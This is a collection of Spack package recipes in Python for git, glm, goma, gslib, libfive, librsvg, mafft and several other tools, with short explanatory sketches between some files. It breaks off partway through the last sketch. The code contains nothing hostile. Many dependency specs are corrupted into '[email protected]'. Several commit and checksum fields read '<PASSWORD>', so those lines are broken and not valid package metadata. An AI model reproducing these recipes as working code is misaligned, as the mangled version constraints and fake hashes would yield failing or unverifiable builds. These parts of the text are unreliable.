url="https://www.kernel.org/pub/software/scm/git/git-manpages-{0}.tar.gz".format(_version),
sha256=_sha256_manpage,
placement='git-manpages',
when='@{0} +man'.format(_version))
variant('tcltk', default=False,
description='Gitk: provide Tcl/Tk in the run environment')
variant('svn', default=False,
description='Provide SVN Perl dependency in run environment')
variant('perl', default=True,
description='Use Perl scripts and libraries')
variant('nls', default=True,
description='Enable native language support')
variant('man', default=True,
description='Install manual pages')
variant('subtree', default=True,
description='Add git-subtree command and capability')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('curl')
depends_on('expat')
depends_on('gettext', when='+nls')
depends_on('iconv')
depends_on('libidn2')
depends_on('openssl')
depends_on('pcre', when='@:2.13')
depends_on('pcre2', when='@2.14:')
depends_on('perl', when='+perl')
depends_on('zlib')
depends_on('openssh', type='run')
depends_on('perl-alien-svn', type='run', when='+svn')
depends_on('tk', type=('build', 'link'), when='+tcltk')
conflicts('+svn', when='~perl')
@classmethod
def determine_version(cls, exe):
output = Executable(exe)('--version', output=str, error=str)
match = re.search(
spack.fetch_strategy.GitFetchStrategy.git_version_re, output)
return match.group(1) if match else None
@classmethod
def determine_variants(cls, exes, version_str):
prefix = os.path.dirname(exes[0])
variants = ''
if 'gitk' in os.listdir(prefix):
variants += '+tcltk'
else:
variants += '~tcltk'
return variants
# See the comment in setup_build_environment re EXTLIBS.
def patch(self):
filter_file(r'^EXTLIBS =$',
'#EXTLIBS =',
'Makefile')
def setup_build_environment(self, env):
# We use EXTLIBS rather than LDFLAGS so that git's Makefile
# inserts the information into the proper place in the link commands
# (alongside the other libraries/paths that configure discovers).
# LDFLAGS is inserted *before* libgit.a, which requires libintl.
# EXTLIBS is inserted *after* libgit.a.
# This depends on the patch method above, which keeps the Makefile
# from stepping on the value that we pass in via the environment.
#
# The test avoids failures when git is an external package.
# In that case the node in the DAG gets truncated and git DOES NOT
# have a gettext dependency.
if '+nls' in self.spec:
if 'intl' in self.spec['gettext'].libs.names:
env.append_flags('EXTLIBS', '-L{0} -lintl'.format(
self.spec['gettext'].prefix.lib))
env.append_flags('CFLAGS', '-I{0}'.format(
self.spec['gettext'].prefix.include))
if '~perl' in self.spec:
env.append_flags('NO_PERL', '1')
def configure_args(self):
spec = self.spec
configure_args = [
'--with-curl={0}'.format(spec['curl'].prefix),
'--with-expat={0}'.format(spec['expat'].prefix),
'--with-iconv={0}'.format(spec['iconv'].prefix),
'--with-openssl={0}'.format(spec['openssl'].prefix),
'--with-zlib={0}'.format(spec['zlib'].prefix),
]
if '+perl' in self.spec:
configure_args.append('--with-perl={0}'.format(spec['perl'].command.path))
if '^pcre' in self.spec:
configure_args.append('--with-libpcre={0}'.format(
spec['pcre'].prefix))
if '^pcre2' in self.spec:
configure_args.append('--with-libpcre2={0}'.format(
spec['pcre2'].prefix))
if '+tcltk' in self.spec:
configure_args.append('--with-tcltk={0}'.format(
self.spec['tk'].prefix.bin.wish))
else:
configure_args.append('--without-tcltk')
return configure_args
@run_after('configure')
def filter_rt(self):
if self.spec.satisfies('platform=darwin'):
# Don't link with -lrt; the system has no (and needs no) librt
filter_file(r' -lrt$', '', 'Makefile')
def check(self):
make('test')
def build(self, spec, prefix):
args = []
if '~nls' in self.spec:
args.append('NO_GETTEXT=1')
make(*args)
if spec.satisfies('platform=darwin'):
with working_dir('contrib/credential/osxkeychain'):
make()
def install(self, spec, prefix):
args = ["install"]
if '~nls' in self.spec:
args.append('NO_GETTEXT=1')
make(*args)
if spec.satisfies('platform=darwin'):
install('contrib/credential/osxkeychain/git-credential-osxkeychain',
join_path(prefix, "libexec", "git-core"))
@run_after('install')
def install_completions(self):
install_tree('contrib/completion', self.prefix.share)
@run_after('install')
def install_manpages(self):
if '~man' in self.spec:
return
prefix = self.prefix
with working_dir('git-manpages'):
install_tree('man1', prefix.share.man.man1)
install_tree('man5', prefix.share.man.man5)
install_tree('man7', prefix.share.man.man7)
@run_after('install')
def install_subtree(self):
if '+subtree' in self.spec:
with working_dir('contrib/subtree'):
make_args = ['V=1', 'prefix={}'.format(self.prefix.bin)]
make(" ".join(make_args))
install_args = ['V=1', 'prefix={}'.format(self.prefix.bin), 'install']
make(" ".join(install_args))
install('git-subtree', self.prefix.bin)
def setup_run_environment(self, env):
# Setup run environment if using SVN extension
# Libs from perl-alien-svn and apr-util are required in
# LD_LIBRARY_PATH
# TODO: extend to other platforms
if "+svn platform=linux" in self.spec:
perl_svn = self.spec['perl-alien-svn']
env.prepend_path('LD_LIBRARY_PATH', join_path(
perl_svn.prefix, 'lib', 'perl5', 'x86_64-linux-thread-multi',
'Alien', 'SVN'))
```
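The per-version manpage handling above drives `resource()` from a single dict, so each release automatically gets a matching, `+man`-gated tarball. A runnable sketch of just that pairing (the dict is trimmed to two entries; the URL template is the package's own):
```python
# Sketch: derive (url, when) pairs for the per-version manpage resources.
MANPAGE_SHA256 = {
    '2.36.1': '3fcd315976f06b54b0abb9c14d38c3d484f431ea4de70a706cc5dddc1799f4f7',
    '2.35.2': '86e153bdd96edd8462cb7a5c57be1b2b670b033c18272b0aa2e6a102acce50be',
}
URL = 'https://www.kernel.org/pub/software/scm/git/git-manpages-{0}.tar.gz'

for version, sha256 in MANPAGE_SHA256.items():
    # The when-spec ties the resource to both the git version and +man:
    print(URL.format(version), '@{0} +man'.format(version), sha256)
```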
#### File: packages/glm/package.py
```python
from spack.package import *
class Glm(CMakePackage):
"""OpenGL Mathematics (GLM) is a header only C++ mathematics library for
graphics software based on the OpenGL Shading Language (GLSL) specification
"""
homepage = "https://github.com/g-truc/glm"
url = "https://github.com/g-truc/glm/archive/0.9.9.8.tar.gz"
git = "https://github.com/g-truc/glm.git"
version('develop', branch="master")
version('0.9.9.8', sha256='7d508ab72cb5d43227a3711420f06ff99b0a0cb63ee2f93631b162bfe1fe9592')
version('0.9.7.1', sha256='285a0dc8f762b4e523c8710fbd97accaace0c61f45bc8be2bdb0deed07b0e6f3')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:', type='build', when='@0.9.9.0:')
# CMake install target was removed in version 0.9.9.6
@when('@0.9.9.6:0.9.9.8')
def cmake(self, spec, prefix):
pass
@when('@0.9.9.6:0.9.9.8')
def build(self, spec, prefix):
pass
@when('@0.9.9.6:0.9.9.8')
def install(self, spec, prefix):
mkdirp(prefix.include.glm)
ignore_cmakelists = lambda p: p.endswith('CMakeLists.txt')
install_tree('glm', prefix.include.glm, ignore=ignore_cmakelists)
mkdirp(prefix.lib64.cmake)
install_tree('cmake', prefix.lib64.cmake)
@when('@develop')
def cmake_args(self):
return [
self.define('GLM_TEST_ENABLE', self.run_tests)
]
```
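For the releases whose CMake install target was removed, the package above turns the `cmake` and `build` phases into no-ops and copies the header tree by hand. A stdlib-only sketch of that copy step (paths are illustrative; Spack's `install_tree` takes a predicate rather than `ignore_patterns`):
```python
import shutil

def install_glm_headers(src='glm', dest='/tmp/glm-prefix/include/glm'):
    # Copy the headers while skipping the CMakeLists.txt files that
    # live alongside them (dirs_exist_ok requires Python 3.8+).
    shutil.copytree(src, dest,
                    ignore=shutil.ignore_patterns('CMakeLists.txt'),
                    dirs_exist_ok=True)
```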
#### File: packages/goma/package.py
```python
from spack.package import *
class Goma(CMakePackage):
"""A Full-Newton Finite Element Program for Free and Moving Boundary Problems with
Coupled Fluid/Solid Momentum, Energy, Mass, and Chemical Species Transport """
homepage = "https://www.gomafem.com"
url = "https://github.com/goma/goma/archive/v7.0.0.tar.gz"
git = "https://github.com/goma/goma.git"
maintainers = ['wortiz']
version('7.0.4', commit='<PASSWORD>')
version('7.0.0', commit='<PASSWORD>')
version('main', branch='main')
version('develop', branch='develop')
# Problem size variants
variant('max_conc', default='4', values=('4', '8', '10', '15', '20'),
description="Set internal maximum number of species")
variant('max_external_field', default='4', values=('4', '8', '10', '15', '20'),
description="Set internal maximum number of external fields")
variant('max_prob_var', default='15', values=('10', '15', '20', '25', '28', '34', '40', '46', '64'),
description="Set internal maximum number of active equations")
variant('mde', default='27', values=('8', '9', '10', '16', '20', '27', '54'),
description="Set internal maximum DOF per element")
# Floating point checks
variant('check_finite', default=True, description="Enable finite computation check")
variant('fpe', default=False, description="Enable floating point exception")
# Optional third party libraries
variant('arpack-ng', default=True, description="Build with ARPACK support")
variant('metis', default=True, description="Build with metis decomposition")
variant('omega-h', default=True, description="Build with Omega_h support")
variant('petsc', default=True, description="Build with PETSc solver support")
variant('sparse', default=True, description="Build with legacy sparse solver")
variant('suite-sparse', default=True, description="Build with UMFPACK support")
# Required dependencies
depends_on('mpi')
depends_on('seacas+applications')
depends_on('trilinos+mpi+epetra+aztec+amesos+stratimikos+teko+mumps+superlu-dist+ml~exodus')
# Optional dependencies
depends_on('arpack-ng', when='+arpack-ng')
depends_on('metis', when='+metis')
depends_on('omega-h+mpi', when='+omega-h')
depends_on('petsc+hypre+mpi~exodusii', when='+petsc')
depends_on('sparse', when='+sparse')
depends_on('suite-sparse', when='+suite-sparse')
def cmake_args(self):
args = []
# Problem sizes
args.append(self.define_from_variant('MAX_CONC', 'max_conc'))
args.append(
self.define_from_variant('MAX_EXTERNAL_FIELD', 'max_external_field'))
args.append(self.define_from_variant('MAX_PROB_VAR', 'max_prob_var'))
args.append(self.define_from_variant('MDE', 'mde'))
# Floating point error checks
args.append(self.define_from_variant('CHECK_FINITE', 'check_finite'))
args.append(self.define_from_variant('FP_EXCEPT', 'fpe'))
# Configure optional libraries
args.append(self.define_from_variant('ENABLE_ARPACK', 'arpack-ng'))
args.append(self.define_from_variant('ENABLE_METIS', 'metis'))
args.append(self.define_from_variant('ENABLE_OMEGA_H', 'omega-h'))
args.append(self.define_from_variant('ENABLE_PETSC', 'petsc'))
args.append(self.define_from_variant('ENABLE_SPARSE', 'sparse'))
args.append(self.define_from_variant('ENABLE_UMFPACK', 'suite-sparse'))
return args
```
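Nearly every option above goes through `define_from_variant`, which turns a variant value into a CMake cache entry. A simplified sketch of the expansion (illustrative only; real Spack also adds a type suffix and handles multi-valued variants):
```python
def define(name, value):
    # Simplified CMake cache-entry formatting for illustration only.
    if isinstance(value, bool):
        value = 'ON' if value else 'OFF'
    return '-D{0}={1}'.format(name, value)

# e.g. define_from_variant('MDE', 'mde') with mde=27 yields roughly:
print(define('MDE', 27))             # -DMDE=27
print(define('CHECK_FINITE', True))  # -DCHECK_FINITE=ON
```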
#### File: packages/go-md2man/package.py
```python
from spack.package import *
class GoMd2man(Package):
"""go-md2man converts markdown into roff (man pages)"""
homepage = "https://github.com/cpuguy83/go-md2man"
url = "https://github.com/cpuguy83/go-md2man/archive/v1.0.10.tar.gz"
version('1.0.10', sha256='76aa56849123b99b95fcea2b15502fd886dead9a5c35be7f78bdc2bad6be8d99')
depends_on('go')
resource(name='blackfriday',
url='https://github.com/russross/blackfriday/archive/v1.5.2.tar.gz',
sha256='626138a08abb8579474a555e9d45cb5260629a2c07e8834428620a650dc9f195',
placement='blackfriday',
destination=join_path('src', 'github.com', 'russross'))
def patch(self):
mkdirp(join_path(self.stage.source_path,
'src', 'github.com', 'russross'))
mkdirp(join_path(self.stage.source_path,
'src', 'github.com', 'cpuguy83'))
ln = which('ln')
ln('-s', self.stage.source_path, join_path(
'src', 'github.com', 'cpuguy83', 'go-md2man'))
def install(self, spec, prefix):
with working_dir('src'):
env['GOPATH'] = self.stage.source_path
env['GO111MODULE'] = 'off'
go = which('go')
go('build', '-v', join_path(
'github.com', 'cpuguy83', 'go-md2man'))
mkdir(prefix.bin)
install('go-md2man', prefix.bin)
```
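The `patch()` step above recreates the pre-module `GOPATH` layout by symlinking the staged sources to the import path that `go build` (with `GO111MODULE=off`) expects. A sketch of the layout it produces (the staging root is illustrative):
```python
import os

stage = '/tmp/stage/go-md2man'  # illustrative staging root
# Expected GOPATH layout:
#   src/github.com/cpuguy83/go-md2man   -> symlink back to the staged sources
#   src/github.com/russross/blackfriday -> the vendored resource
link = os.path.join(stage, 'src', 'github.com', 'cpuguy83', 'go-md2man')
os.makedirs(os.path.dirname(link), exist_ok=True)
if not os.path.lexists(link):
    os.symlink(stage, link)
```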
#### File: packages/gslib/package.py
```python
from spack.package import *
class Gslib(Package):
"""Highly scalable Gather-scatter code with AMG and XXT solvers"""
homepage = "https://github.com/gslib/gslib"
git = "https://github.com/gslib/gslib.git"
version('develop', branch='master')
version('1.0.7', tag='v1.0.7')
version('1.0.6', tag='v1.0.6')
version('1.0.5', tag='v1.0.5')
version('1.0.4', tag='v1.0.4')
version('1.0.3', tag='v1.0.3')
version('1.0.2', tag='v1.0.2')
version('1.0.1', tag='v1.0.1')
version('1.0.0', tag='v1.0.0')
variant('mpi', default=True, description='Build with MPI')
variant('mpiio', default=True, description='Build with MPI I/O')
variant('blas', default=False, description='Build with BLAS')
depends_on('mpi', when="+mpi")
depends_on('mpi', when="+mpiio")
depends_on('blas', when="+blas")
conflicts('~mpi', when='+mpiio')
def install(self, spec, prefix):
src_dir = 'src'
lib_dir = 'lib'
libname = 'libgs.a'
if self.spec.satisfies('@1.0.1:'):
makefile = 'Makefile'
else:
makefile = 'src/Makefile'
cc = self.compiler.cc
if '+mpiio' not in spec:
filter_file(r'MPIIO.*?=.*1', 'MPIIO = 0', makefile)
if '+mpi' in spec:
cc = spec['mpi'].mpicc
else:
filter_file(r'MPI.*?=.*1', 'MPI = 0', makefile)
filter_file(r'MPIIO.*?=.*1', 'MPIIO = 0', makefile)
make_cmd = "CC=" + cc
if '+blas' in spec:
filter_file(r'BLAS.*?=.*0', 'BLAS = 1', makefile)
blas = spec['blas'].libs
ld_flags = blas.ld_flags
filter_file(r'\$\(LDFLAGS\)', ld_flags, makefile)
if self.spec.satisfies('@1.0.3:'):
make(make_cmd)
make('install', 'INSTALL_ROOT=%s' % self.prefix)
else:
if self.spec.satisfies('@1.0.1:'):
make(make_cmd)
make('install')
install_tree(lib_dir, prefix.lib)
elif self.version == Version('1.0.0'):
with working_dir(src_dir):
make(make_cmd)
mkdir(prefix.lib)
install(libname, prefix.lib)
# Should only install the headers (this will be fixed in gslib on
# future releases).
install_tree(src_dir, prefix.include)
```
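The install logic above toggles Makefile switches with regex substitution. A self-contained sketch of what one `filter_file` call does, using `re.sub` on a made-up Makefile fragment:
```python
import re

text = 'CC = cc\nMPIIO = 1\n'  # made-up Makefile fragment

# Equivalent of filter_file(r'MPIIO.*?=.*1', 'MPIIO = 0', makefile),
# which filter_file applies line by line:
print(re.sub(r'MPIIO.*?=.*1', 'MPIIO = 0', text))
```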
#### File: packages/herwigpp/package.py
```python
from spack.package import *
from spack.pkg.builtin.boost import Boost
class Herwigpp(AutotoolsPackage):
"""Herwig is a multi-purpose particle physics event generator.
This package provides old Herwig++ 2 generator"""
homepage = "https://herwig.hepforge.org/"
url = "http://lcgpackages.web.cern.ch/lcgpackages/tarFiles/sources/MCGeneratorsTarFiles/Herwig++-2.7.1.tar.bz2"
tags = ['hep']
version('2.7.1', '<PASSWORD>')
patch('herwig++-2.7.1.patch', when='@2.7.1', level=0)
depends_on('gsl')
# TODO: replace this with an explicit list of components of Boost,
# for instance depends_on('boost +filesystem')
# See https://github.com/spack/spack/pull/22303 for reference
depends_on(Boost.with_default_variants)
depends_on('fastjet')
depends_on('[email protected]', when='@2.7.1')
def setup_build_environment(self, env):
env.prepend_path('LD_LIBRARY_PATH', self.spec['thepeg'].prefix.lib.ThePEG)
def configure_args(self):
args = ['--with-gsl=' + self.spec['gsl'].prefix,
'--with-thepeg=' + self.spec['thepeg'].prefix,
'--with-fastjet=' + self.spec['fastjet'].prefix,
'--with-boost=' + self.spec['boost'].prefix]
return args
def build(self, spec, prefix):
make()
with working_dir('Contrib'):
make()
with working_dir('Contrib/AlpGen'):
make('BasicLesHouchesFileReader.so',
"HERWIGINCLUDE=-I{0}/include".format(self.stage.source_path))
make('AlpGenHandler.so',
"HERWIGINCLUDE=-I{0}/include".format(self.stage.source_path))
def install(self, spec, prefix):
make('install')
install(
join_path(self.stage.source_path,
'Contrib', 'AlpGen', 'AlpGenHandler.so'),
join_path(prefix.lib, 'Herwig++', 'AlpGenHandler.so'))
install(
join_path(self.stage.source_path,
'Contrib', 'AlpGen', 'BasicLesHouchesFileReader.so'),
join_path(prefix.lib, 'Herwig++', 'BasicLesHouchesFileReader.so'))
```
#### File: packages/iegenlib/package.py
```python
from spack.package import *
class Iegenlib(CMakePackage):
"""Inspector/Executor Generation Library for manipulating sets
and relations with uninterpreted function symbols. """
homepage = "https://github.com/CompOpt4Apps/IEGenLib"
git = "https://github.com/CompOpt4Apps/IEGenLib.git"
url = "https://github.com/CompOpt4Apps/IEGenLib/archive/fc479ee6ff01dba26beffc1dc6bacdba03262138.zip"
maintainers = ['dhuth']
version('master', branch='master')
version('2018-07-03',
url="https://github.com/CompOpt4Apps/IEGenLib/archive/fc479ee6ff01dba26beffc1dc6bacdba03262138.zip",
sha256='b4c0b368363fcc1e34b388057cc0940bb87fc336cebb0772fd6055f45009b12b')
depends_on('[email protected]:', type='build')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('texinfo', type='build')
depends_on('isl')
build_directory = 'spack-build'
@run_before('cmake')
def make_dirs(self):
autoreconf = which('autoreconf')
with working_dir('lib/isl'):
autoreconf('-i')
mkdirp('spack-build/bin')
def cmake_args(self):
args = []
args.append('-DGEN_PARSER=no')
args.append('-DBUILD_PYTHON=no')
return args
```
#### File: packages/libconfuse/package.py
```python
from spack.package import *
class Libconfuse(AutotoolsPackage):
"""Small configuration file parser library for C."""
homepage = "https://github.com/martinh/libconfuse"
url = "https://github.com/martinh/libconfuse/archive/v3.2.2.tar.gz"
version('3.2.2', sha256='2cf7e032980aff8f488efba61510dc3fb95e9a4b9183f985dea457a5651b0e2c')
version('3.2.1', sha256='2eff8e3c300c4ed1d67fdb13f9d31a72a68e31874b4640db15334305bc40cebd')
depends_on('m4', type='build')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('gettext', type='build')
depends_on('flex', type='build')
def autoreconf(self, spec, prefix):
bash = which('bash')
bash('./autogen.sh')
```
#### File: packages/libfive/package.py
```python
from spack.package import *
from spack.pkg.builtin.boost import Boost
class Libfive(CMakePackage):
"""libfive is a software library and set of tools for solid modeling."""
homepage = "https://libfive.com"
git = "https://github.com/libfive/libfive.git"
# https://libfive.com/download/ recommends working from the master branch
# and currently, all tags are from 2017:
version('master', branch='master')
depends_on('pkgconfig', type='build')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:')
# TODO: replace this with an explicit list of components of Boost,
# for instance depends_on('boost +filesystem')
# See https://github.com/spack/spack/pull/22303 for reference
depends_on(Boost.with_default_variants)
depends_on('[email protected]:')
depends_on('libpng')
depends_on('python@3:', when='+python', type=('link', 'run'))
depends_on('[email protected]:', when='+guile')
# In case build of future git master fails, check raising the minimum Qt version
depends_on('[email protected]:+opengl', when='+qt')
variant('qt', default=True, description='Enable Studio UI (with Guile or Python)')
variant('guile', default=True, description='Enable Guile support for Studio UI')
variant('python', default=True, description='Enable Python support for Studio UI')
variant('packed_opcodes', default=False,
description='Packed opcodes break compatibility with saved f-reps!')
def cmake_args(self):
if self.spec.satisfies('+qt~guile~python'):
raise InstallError('The Qt-based Studio UI (+qt) needs +guile or +python!')
return [self.define_from_variant('BUILD_STUDIO_APP', 'qt'),
self.define_from_variant('BUILD_GUILE_BINDINGS', 'guile'),
self.define_from_variant('BUILD_PYTHON_BINDINGS', 'python'),
self.define_from_variant('LIBFIVE_PACKED_OPCODES', 'packed_opcodes')]
```
#### File: packages/libfms/package.py
```python
from spack.package import *
class Libfms(CMakePackage):
"""Field and Mesh Specification (FMS) library"""
homepage = "https://github.com/CEED/FMS"
git = "https://github.com/CEED/FMS.git"
tags = ['FEM', 'Meshes', 'Fields', 'High-order', 'I/O', 'Data-exchange']
maintainers = ['v-dobrev', 'tzanio', 'cwsmith']
version('develop', branch='master')
version('0.2.0', tag='v0.2')
variant('conduit', default=True,
description='Build with Conduit I/O support')
variant('shared', default=True,
description='Build shared libraries')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:', when='+conduit')
def cmake_args(self):
args = []
args.extend([
self.define_from_variant('BUILD_SHARED_LIBS', 'shared'),
])
if '+conduit' in self.spec:
args.extend([
self.define('CONDUIT_DIR', self.spec['conduit'].prefix)
])
return args
@property
def headers(self):
"""Export the FMS headers.
Sample usage: spec['libfms'].headers.cpp_flags
"""
fms_h_names = ['fms', 'fmsio']
hdrs = find_headers(fms_h_names, self.prefix.include, recursive=False)
return hdrs or None # Raise an error if no headers are found
@property
def libs(self):
"""Export the FMS library.
Sample usage: spec['libfms'].libs.ld_flags
"""
is_shared = '+shared' in self.spec
libs = find_libraries('libfms', root=self.prefix, shared=is_shared,
recursive=True)
return libs or None # Raise an error if no libs are found
```
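Both properties above end in `return xs or None`: an empty search result is falsy, so `or None` collapses "nothing found" into `None`, which Spack treats as an error for the dependent instead of a silently empty flag list. The idiom in isolation:
```python
def found_or_none(found):
    # An empty list is falsy, so `found or None` signals "nothing found".
    return found or None

assert found_or_none(['libfms.so']) == ['libfms.so']
assert found_or_none([]) is None
```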
#### File: packages/libnotify/package.py
```python
from spack.package import *
class Libnotify(MesonPackage):
"""libnotify is a library for sending desktop notifications"""
homepage = "https://github.com/GNOME/libnotify"
url = "https://github.com/GNOME/libnotify/archive/0.7.9.tar.gz"
version('0.7.9', sha256='9bd4f5fa911d27567e7cc2d2d09d69356c16703c4e8d22c0b49a5c45651f3af0')
# Libnotify has trouble finding the DTD and XSLT for docbook,
# which are required for both of these variants.
# variant('docbook', default=False,
# description='Build docbook docs. Currently broken')
# variant('gtkdoc', default=False,
# description='Build with gtkdoc. Currently broken')
depends_on('pkgconfig', type='build')
depends_on('[email protected]:')
depends_on('[email protected]:')
depends_on('gobject-introspection')
depends_on('libxslt', type='build')
depends_on('docbook-xsl', type='build')
# depends_on('gtk-doc', when='+gtkdoc', type='build')
# depends_on('xmlto', when='+docbook', type='build')
patch('docbook-location.patch')
def meson_args(self):
# spec = self.spec
args = []
# if '+docbook' in spec:
# args.append('-Ddocbook_docs=enabled')
# else:
# args.append('-Ddocbook_docs=disabled')
args.append('-Ddocbook_docs=disabled')
# if self.run_tests:
# args.append('-Dtests=true')
# else:
# args.append('-Dtests=false')
args.append('-Dtests=false')
# if '+gtkdoc' in spec:
# args.append('-Dgtk_doc=true')
# else:
# args.append('-Dgtk_doc=false')
args.append('-Dgtk_doc=false')
return args
```
#### File: packages/libpsml/package.py
```python
from spack.package import *
class Libpsml(AutotoolsPackage):
"""libPSML is a library to handle pseudopotentials in PSML format."""
homepage = "https://gitlab.com/siesta-project/libraries/libpsml"
git = "https://gitlab.com/siesta-project/libraries/libpsml.git"
url = "https://gitlab.com/siesta-project/libraries/libpsml/-/archive/libpsml-1.1.10/libpsml-libpsml-1.1.10.tar.gz"
version('1.1.10', sha256='ba87ece7d443a42a5db3a119c555a29a391a060dd6f3f5039a2c6ea248b7fe84')
version('1.1.9', sha256='04b8de33c555ae94a790116cd3cf7b6c9e8ec9a018562edff544a2e04876cf0c')
version('1.1.8', sha256='77498783be1bc7006819f36c42477b5913464b8c660203f7d6b7f7e25aa29145')
version('1.1.7', sha256='b3f5431fd3965b66fe01b899c0c3ef73d9f969d67329cd1f5aba84fb056b5dd1')
version('1.1.6', sha256='521647dbd945b208e5d468fceeb2bc397737d9a659e2c7549597bf4eb29f60df')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:', type='build')
depends_on('m4', type='build')
depends_on('xmlf90')
def configure_args(self):
return ['--with-xmlf90=%s' % self.spec['xmlf90'].prefix]
```
#### File: packages/librsvg/package.py
```python
from spack.package import *
class Librsvg(AutotoolsPackage):
"""Library to render SVG files using Cairo"""
homepage = "https://wiki.gnome.org/Projects/LibRsvg"
url = "https://download.gnome.org/sources/librsvg/2.44/librsvg-2.44.14.tar.xz"
version('2.51.0', sha256='89d32e38445025e1b1d9af3dd9d3aeb9f6fce527aeecbecf38b369b34c80c038')
version('2.50.2', sha256='6211f271ce4cd44a7318190d36712e9cea384a933d3e3570004edeb210a056d3')
version('2.50.0', sha256='b3fadba240f09b9c9898ab20cb7311467243e607cf8f928b7c5f842474ee3df4')
version('2.44.14', sha256='6a85a7868639cdd4aa064245cc8e9d864dad8b8e9a4a8031bb09a4796bc4e303')
variant('doc', default=False, description='Build documentation with gtk-doc')
depends_on("gobject-introspection", type='build')
depends_on("pkgconfig", type='build')
depends_on("rust", type='build')
depends_on('gtk-doc', type='build', when='+doc')
depends_on("cairo+gobject")
depends_on("gdk-pixbuf")
depends_on("glib")
depends_on("libcroco")
depends_on("pango")
depends_on('libffi')
depends_on('libxml2')
depends_on('shared-mime-info')
def url_for_version(self, version):
url = "https://download.gnome.org/sources/librsvg/"
url += "{0}/librsvg-{1}.tar.xz"
return url.format(version.up_to(2), version)
def setup_dependent_build_environment(self, env, dependent_spec):
env.prepend_path('XDG_DATA_DIRS', self.prefix.share)
def setup_dependent_run_environment(self, env, dependent_spec):
env.prepend_path('XDG_DATA_DIRS', self.prefix.share)
def setup_build_environment(self, env):
env.prepend_path('XDG_DATA_DIRS', self.prefix.share)
# librsvg uses pthread_atfork() but does not use -pthread on Ubuntu 18.04 %gcc@8
env.append_flags('LDFLAGS', '-pthread')
def setup_run_environment(self, env):
env.prepend_path('XDG_DATA_DIRS', self.prefix.share)
def configure_args(self):
return [
'--enable-gtk-doc=' + ('yes' if self.spec.variants['doc'].value else 'no')
]
```
#### File: packages/lshw/package.py
```python
from spack.package import *
class Lshw(MakefilePackage):
"""
lshw is a small tool to provide detailed information on the
hardware configuration of the machine. It can report exact memory
configuration, firmware version, mainboard configuration, CPU version
and speed, cache configuration, bus speed, etc. on DMI-capable x86 or
EFI (IA-64) systems and on some ARM and PowerPC machines.
"""
homepage = "https://github.com/lyonel/lshw"
url = "https://github.com/lyonel/lshw/archive/B.02.18.tar.gz"
version('02.18', sha256='aa8cb2eebf36e9e46dfc227f24784aa8c87181ec96e57ee6c455da8a0ce4fa77')
version('02.17', sha256='0bb76c7df7733dc9b80d5d35f9d9752409ddb506e190453a2cc960461de5ddeb')
version('02.16', sha256='58a7731d204791dd33db5eb3fde9808d1235283e069e6c33a193637ccec27b3e')
version('02.15', sha256='33c51ba0554d4bcd8ff9a67e5971a63b9ddd58213e2901a09000815376bc61b9')
def install(self, spec, prefix):
make('install')
install_tree('.', prefix)
```
#### File: packages/mafft/package.py
```python
from spack.package import *
class Mafft(Package):
"""MAFFT is a multiple sequence alignment program for unix-like
operating systems. It offers a range of multiple alignment
methods, L-INS-i (accurate; for alignment of <~200 sequences),
FFT-NS-2 (fast; for alignment of <~30,000 sequences), etc."""
homepage = "https://mafft.cbrc.jp/alignment/software/index.html"
url = "https://mafft.cbrc.jp/alignment/software/mafft-7.221-with-extensions-src.tgz"
version('7.481', sha256='7397f1193048587a3d887e46a353418e67849f71729764e8195b218e3453dfa2')
version('7.475', sha256='bb6973ae089ea18cfbd3861a5b9d2c8b7e1543a1fdc78ac2d7cd8dbe3443f319')
version('7.453', sha256='8b2f0d6249c575f80cd51278ab45dd149b8ac9b159adac20fd1ddc7a6722af11')
version('7.407', sha256='1840b51a0b93f40b4d6076af996ee46396428d8dbaf7ba1d847abff9cb1463e5')
version('7.221', sha256='0bc78111966d9b00ddfa14fa217fa5bb0c593a558674a13f02dca7bcd51f7fcf')
def install(self, spec, prefix):
with working_dir('core'):
make('PREFIX=%s' % prefix)
make('PREFIX=%s' % prefix, 'install')
with working_dir('extensions'):
make('PREFIX=%s' % prefix)
make('PREFIX=%s' % prefix, 'install')
```
#### File: packages/minismac2d/package.py
```python
from spack.package import *
class Minismac2d(MakefilePackage):
"""Proxy Application. Solves the finite-differenced 2D incompressible
Navier-Stokes equations with Spalart-Allmaras one-equation
turbulence model on a structured body conforming grid.
"""
homepage = "https://mantevo.org"
url = "https://downloads.mantevo.org/releaseTarballs/miniapps/MiniSMAC2D/miniSMAC2D-2.0.tgz"
tags = ['proxy-app']
version('2.0', sha256='ec01b74c06a2c0386efbbb61b14305327342a08fb92bf52e76f60a2063adf065')
depends_on('mpi')
parallel = False
@property
def build_targets(self):
targets = [
'CPP=cpp',
'FC={0}'.format(self.spec['mpi'].mpifc),
'LD={0}'.format(self.spec['mpi'].mpifc),
'MPIDIR=-I{0}'.format(self.spec['mpi'].headers.directories[0]),
'CPPFLAGS=-P -traditional -DD_PRECISION',
'FFLAGS=-O3 -c -g -DD_PRECISION',
'LDFLAGS=-O3',
'--file=Makefile_mpi_only'
]
return targets
def edit(self, spec, prefix):
# Editing input file to point to installed data files
param_file = FileFilter('smac2d.in')
param_file.filter('bcmain_directory=.*', "bcmain_directory='.'")
param_file.filter('bcmain_filename=.*',
"bcmain_filename='bcmain.dat_original_119x31'")
param_file.filter('xygrid_directory=.*', "xygrid_directory='.'")
param_file.filter('xygrid_filename=.*',
"xygrid_filename='xy.dat_original_119x31'")
def install(self, spec, prefix):
# Manual Installation
mkdirp(prefix.bin)
mkdirp(prefix.doc)
install('smac2d_mpi_only', prefix.bin)
install('bcmain.dat_original_119x31', prefix.bin)
install('xy.dat_original_119x31', prefix.bin)
install('smac2d.in', prefix.bin)
install('README.txt', prefix.doc)
```
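With `MakefilePackage`, the `build_targets` list above is appended to the `make` invocation verbatim, so the build phase boils down to one command line. A sketch of roughly what gets run (the MPI wrapper and include paths are illustrative):
```python
targets = [
    'CPP=cpp',
    'FC=/opt/mpi/bin/mpif90',
    'LD=/opt/mpi/bin/mpif90',
    'MPIDIR=-I/opt/mpi/include',
    'CPPFLAGS=-P -traditional -DD_PRECISION',
    'FFLAGS=-O3 -c -g -DD_PRECISION',
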